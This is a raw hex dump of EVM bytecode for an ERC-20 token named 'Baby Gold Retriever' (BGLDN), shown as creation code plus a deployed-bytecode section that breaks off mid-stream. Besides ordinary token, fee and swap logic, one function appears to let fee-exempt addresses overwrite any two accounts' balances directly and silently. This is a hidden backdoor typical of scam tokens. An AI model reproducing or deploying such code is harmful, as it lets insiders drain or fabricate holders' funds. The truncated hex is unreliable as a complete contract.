61021957806323b872dd1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d7565b60405161017d9190611faf565b60405180910390f35b34801561019257600080fd5b506101ad60048036038101906101a89190611cee565b610614565b6040516101ba9190611f79565b60405180910390f35b3480156101cf57600080fd5b506101d8610632565b6040516101e59190611f94565b60405180910390f35b3480156101fa57600080fd5b50610203610658565b60405161021091906120d1565b60405180910390f35b34801561022557600080fd5b5061022e610662565b60405161023b91906120d1565b60405180910390f35b34801561025057600080fd5b5061026b60048036038101906102669190611c9b565b610668565b6040516102789190611f79565b60405180910390f35b34801561028d57600080fd5b50610296610720565b6040516102a39190612146565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190611cee565b610729565b6040516102e09190611f79565b60405180910390f35b3480156102f557600080fd5b50610310600480360381019061030b9190611c01565b6107d5565b005b34801561031e57600080fd5b506103276108c5565b6040516103349190611f5e565b60405180910390f35b34801561034957600080fd5b50610364600480360381019061035f9190611c01565b6108eb565b6040516103719190611f79565b60405180910390f35b34801561038657600080fd5b5061038f610941565b60405161039c91906120d1565b60405180910390f35b3480156103b157600080fd5b506103cc60048036038101906103c79190611c01565b610947565b6040516103d991906120d1565b60405180910390f35b3480156103ee57600080fd5b506103f7610990565b005b34801561040557600080fd5b5061040e610ae3565b60405161041b91906120d1565b60405180910390f35b34801561043057600080fd5b50610439610ae9565b6040516104469190611f5e565b60405180910390f35b34801561045b57600080fd5b50610464610b12565b6040516104719190611faf565b60405180910390f35b34801561048657600080fd5b5061048f610b4f565b60405161049c9190611f5e565b60405180910390f35b3480156104b157600080fd5b506104cc60048036038101906104c79190611cee565b610b75565b6040516104d99190611f79565b60405180910390f35b3480156104ee57600080fd5b5061050960048036038101906105049190611cee565b610c21565b6040516105169190611f79565b60405180910390f35b34801561052b57600080fd5b5061054660048036038101906105419190611c5b565b610c3f565b60405161055391906120d1565b60405180910390f35b34801561056857600080fd5b50610583600480360381019061057e9190611c01565b610cc6565b005b34801561059157600080fd5b506105ac60048036038101906105a79190611c9b565b610db6565b005b3480156105ba57600080fd5b506105d560048036038101906105d09190611c01565b610e99565b005b60606040518060400160405280601381526020017f4261627920476f6c642052657472696576657200000000000000000000000000815250905090565b600061062861062161105b565b8484611063565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60085481565b600061067584848461122e565b6107158461068161105b565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106cb61105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107109190612297565b611063565b600190509392505050565b60006009905090565b60006107cb61073661105b565b84846004600061074461105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107c691906121b6565b611063565b6001905092915050565b6107dd61105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461086a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086190612051565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60095481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61099861105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c90612051565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017f42474c444e200000000000000000000000000000000000000000000000000000815250905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c17610b8261105b565b848460046000610b9061105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c129190612297565b611063565b6001905092915050565b6000610c35610c2e61105b565b848461122e565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cce61105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5290612051565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610e0c57600080fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b610ea161105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2590612051565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610f9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9590611ff1565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156110d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ca906120b1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611143576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113a90612011565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161122191906120d1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561129e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129590612091565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590611fd1565b60405180910390fd5b60008111611351576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134890612071565b60405180910390fd5b611359610ae9565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156113c75750611397610ae9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156114215750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561147f576007548161143384610947565b61143d91906121b6565b111561147e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147590612031565b60405180910390fd5b5b64012a05f20061148e30610947565b101580156114a95750600a60149054906101000a900460ff16155b80156115035750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156115425750611512610ae9565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156115815750611551610ae9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156115d4576001600a60146101000a81548160ff02191690831515021790555060006115ac30610947565b90506115b7816117a6565b6000600a60146101000a81548160ff021916908315150217905550505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546116239190612297565b925050819055506000819050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156116d35750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156116e5576116e2828561182a565b90505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461173491906121b6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161179891906120d1565b60405180910390a350505050565b60006117b182611959565b9050600081111561182657600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f19350505050158015611824573d6000803e3d6000fd5b505b5050565b60008060646008548561183d919061223d565b611847919061220c565b9050600060646009548661185b919061223d565b611865919061220c565b9050808261187391906121b6565b600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546118c191906121b6565b925050819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef838561192391906121b6565b60405161193091906120d1565b60405180910390a38082866119459190612297565b61194f9190612297565b9250505092915050565b6000804790506000600267ffffffffffffffff81111561197c5761197b612416565b5b6040519080825280602002602001820160405280156119aa5781602001602082028036833780820191505090505b50905030816000815181106119c2576119c16123e7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015611a6457600080fd5b505afa158015611a78573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a9c9190611c2e565b81600181518110611ab057611aaf6123e7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611b1730600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1686611063565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478560008430426040518663ffffffff1660e01b8152600401611b7b9594939291906120ec565b600060405180830381600087803b158015611b9557600080fd5b505af1158015611ba9573d6000803e3d6000fd5b505050508147611bb99190612297565b92505050919050565b600081359050611bd1816126ad565b92915050565b600081519050611be6816126ad565b92915050565b600081359050611bfb816126c4565b92915050565b600060208284031215611c1757611c16612445565b5b6000611c2584828501611bc2565b91505092915050565b600060208284031215611c4457611c43612445565b5b6000611c5284828501611bd7565b91505092915050565b60008060408385031215611c7257611c71612445565b5b6000611c8085828601611bc2565b9250506020611c9185828601611bc2565b9150509250929050565b600080600060608486031215611cb457611cb3612445565b5b6000611cc286828701611bc2565b9350506020611cd386828701611bc2565b9250506040611ce486828701611bec565b9150509250925092565b60008060408385031215611d0557611d04612445565b5b6000611d1385828601611bc2565b9250506020611d2485828601611bec565b9150509250929050565b6000611d3a8383611d46565b60208301905092915050565b611d4f816122cb565b82525050565b611d5e816122cb565b82525050565b6000611d6f82612171565b611d798185612194565b9350611d8483612161565b8060005b83811015611db5578151611d9c8882611d2e565b9750611da783612187565b925050600181019050611d88565b5085935050505092915050565b611dcb816122dd565b82525050565b611dda81612320565b82525050565b611de981612344565b82525050565b6000611dfa8261217c565b611e0481856121a5565b9350611e14818560208601612356565b611e1d8161244a565b840191505092915050565b6000611e356023836121a5565b9150611e408261245b565b604082019050919050565b6000611e586026836121a5565b9150611e63826124aa565b604082019050919050565b6000611e7b6022836121a5565b9150611e86826124f9565b604082019050919050565b6000611e9e6028836121a5565b9150611ea982612548565b604082019050919050565b6000611ec16020836121a5565b9150611ecc82612597565b602082019050919050565b6000611ee46029836121a5565b9150611eef826125c0565b604082019050919050565b6000611f076025836121a5565b9150611f128261260f565b604082019050919050565b6000611f2a6024836121a5565b9150611f358261265e565b604082019050919050565b611f4981612309565b82525050565b611f5881612313565b82525050565b6000602082019050611f736000830184611d55565b92915050565b6000602082019050611f8e6000830184611dc2565b92915050565b6000602082019050611fa96000830184611dd1565b92915050565b60006020820190508181036000830152611fc98184611def565b905092915050565b60006020820190508181036000830152611fea81611e28565b9050919050565b6000602082019050818103600083015261200a81611e4b565b9050919050565b6000602082019050818103600083015261202a81611e6e565b9050919050565b6000602082019050818103600083015261204a81611e91565b9050919050565b6000602082019050818103600083015261206a81611eb4565b9050919050565b6000602082019050818103600083015261208a81611ed7565b9050919050565b600060208201905081810360008301526120aa81611efa565b9050919050565b600060208201905081810360008301526120ca81611f1d565b9050919050565b60006020820190506120e66000830184611f40565b92915050565b600060a0820190506121016000830188611f40565b61210e6020830187611de0565b81810360408301526121208186611d64565b905061212f6060830185611d55565b61213c6080830184611f40565b9695505050505050565b600060208201905061215b6000830184611f4f565b92915050565b6000819050602082019050919050565b600081519050919050565b600081519050919050565b6000602082019050919050565b600082825260208201905092915050565b600082825260208201905092915050565b60006121c182612309565b91506121cc83612309565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561220157612200612389565b5b828201905092915050565b600061221782612309565b915061222283612309565b925082612232576122316123b8565b5b828204905092915050565b600061224882612309565b915061225383612309565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561228c5761228b612389565b5b828202905092915050565b60006122a282612309565b91506122ad83612309565b9250828210156122c0576122bf612389565b5b828203905092915050565b60006122d6826122e9565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b600061232b82612332565b9050919050565b600061233d826122e9565b9050919050565b600061234f82612309565b9050919050565b60005b83811015612374578082015181840152602081019050612359565b83811115612383576000848401525b50505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6126b6816122cb565b81146126c157600080fd5b50565b6126cd81612309565b81146126d857600080fd5b5056fea2646970667358221220558fd589e378fde416c8d2dd5d2ea54ef7633687dc0e294e0b92dd1319389dfe64736f6c63430008050033
Deployed Bytecode
0x60806040526004361061014f5760003560e01c806370a08231116100b6578063a457c2d71161006f578063a457c2d7146104a5578063a9059cbb146104e2578063dd62ed3e1461051f578063ea2f0b371461055c578063eee8c4be14610585578063f2fde38b146105ae57610156565b806370a08231146103a5578063715018a6146103e25780637d1db4a5146103f95780638da5cb5b1461042457806395d89b411461044f578063962dfc751461047a57610156565b8063313ce56711610108578063313ce5671461028157806339509351146102ac578063437823ec146102e957806349bd5a5e146103125780635342acb41461033d5780636bc87c3a1461037a57610156565b806306fdde031461015b578063095ea7b3146101865780631694505e146101c357806318160ddd146101ee57806322976e0d1461021957806323b872dd1461024457610156565b3661015657005b600080fd5b34801561016757600080fd5b506101706105d7565b60405161017d9190611faf565b60405180910390f35b34801561019257600080fd5b506101ad60048036038101906101a89190611cee565b610614565b6040516101ba9190611f79565b60405180910390f35b3480156101cf57600080fd5b506101d8610632565b6040516101e59190611f94565b60405180910390f35b3480156101fa57600080fd5b50610203610658565b60405161021091906120d1565b60405180910390f35b34801561022557600080fd5b5061022e610662565b60405161023b91906120d1565b60405180910390f35b34801561025057600080fd5b5061026b60048036038101906102669190611c9b565b610668565b6040516102789190611f79565b60405180910390f35b34801561028d57600080fd5b50610296610720565b6040516102a39190612146565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190611cee565b610729565b6040516102e09190611f79565b60405180910390f35b3480156102f557600080fd5b50610310600480360381019061030b9190611c01565b6107d5565b005b34801561031e57600080fd5b506103276108c5565b6040516103349190611f5e565b60405180910390f35b34801561034957600080fd5b50610364600480360381019061035f9190611c01565b6108eb565b6040516103719190611f79565b60405180910390f35b34801561038657600080fd5b5061038f610941565b60405161039c91906120d1565b60405180910390f35b3480156103b157600080fd5b506103cc60048036038101906103c79190611c01565b610947565b6040516103d991906120d1565b60405180910390f35b3480156103ee57600080fd5b506103f7610990565b005b34801561040557600080fd5b5061040e610ae3565b60405161041b91906120d1565b60405180910390f35b34801561043057600080fd5b50610439610ae9565b6040516104469190611f5e565b60405180910390f35b34801561045b57600080fd5b50610464610b12565b6040516104719190611faf565b60405180910390f35b34801561048657600080fd5b5061048f610b4f565b60405161049c9190611f5e565b60405180910390f35b3480156104b157600080fd5b506104cc60048036038101906104c79190611cee565b610b75565b6040516104d99190611f79565b60405180910390f35b3480156104ee57600080fd5b5061050960048036038101906105049190611cee565b610c21565b6040516105169190611f79565b60405180910390f35b34801561052b57600080fd5b5061054660048036038101906105419190611c5b565b610c3f565b60405161055391906120d1565b60405180910390f35b34801561056857600080fd5b50610583600480360381019061057e9190611c01565b610cc6565b005b34801561059157600080fd5b506105ac60048036038101906105a79190611c9b565b610db6565b005b3480156105ba57600080fd5b506105d560048036038101906105d09190611c01565b610e99565b005b60606040518060400160405280601381526020017f4261627920476f6c642052657472696576657200000000000000000000000000815250905090565b600061062861062161105b565b8484611063565b6001905092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600654905090565b60085481565b600061067584848461122e565b6107158461068161105b565b84600460008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106cb61105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107109190612297565b611063565b600190509392505050565b60006009905090565b60006107cb61073661105b565b84846004600061074461105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107c691906121b6565b611063565b6001905092915050565b6107dd61105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461086a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086190612051565b60405180910390fd5b6001600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60095481565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61099861105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c90612051565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60075481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017f42474c444e200000000000000000000000000000000000000000000000000000815250905090565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000610c17610b8261105b565b848460046000610b9061105b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c129190612297565b611063565b6001905092915050565b6000610c35610c2e61105b565b848461122e565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cce61105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5290612051565b60405180910390fd5b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600560003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610e0c57600080fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b610ea161105b565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2590612051565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610f9e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9590611ff1565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156110d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ca906120b1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611143576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113a90612011565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161122191906120d1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561129e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129590612091565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590611fd1565b60405180910390fd5b60008111611351576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134890612071565b60405180910390fd5b611359610ae9565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141580156113c75750611397610ae9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156114215750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561147f576007548161143384610947565b61143d91906121b6565b111561147e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161147590612031565b60405180910390fd5b5b64012a05f20061148e30610947565b101580156114a95750600a60149054906101000a900460ff16155b80156115035750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156115425750611512610ae9565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156115815750611551610ae9565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156115d4576001600a60146101000a81548160ff02191690831515021790555060006115ac30610947565b90506115b7816117a6565b6000600a60146101000a81548160ff021916908315150217905550505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546116239190612297565b925050819055506000819050600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156116d35750600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156116e5576116e2828561182a565b90505b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461173491906121b6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161179891906120d1565b60405180910390a350505050565b60006117b182611959565b9050600081111561182657600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f19350505050158015611824573d6000803e3d6000fd5b505b5050565b60008060646008548561183d919061223d565b611847919061220c565b9050600060646009548661185b919061223d565b611865919061220c565b9050808261187391906121b6565b600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546118c191906121b6565b925050819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef838561192391906121b6565b60405161193091906120d1565b60405180910390a38082866119459190612297565b61194f9190612297565b9250505092915050565b6000804790506000600267ffffffffffffffff81111561197c5761197b612416565b5b6040519080825280602002602001820160405280156119aa5781602001602082028036833780820191505090505b50905030816000815181106119c2576119c16123e7565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015611a6457600080fd5b505afa158015611a78573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a9c9190611c2e565b81600181518110611ab057611aaf6123e7565b5b602002602001019073ffff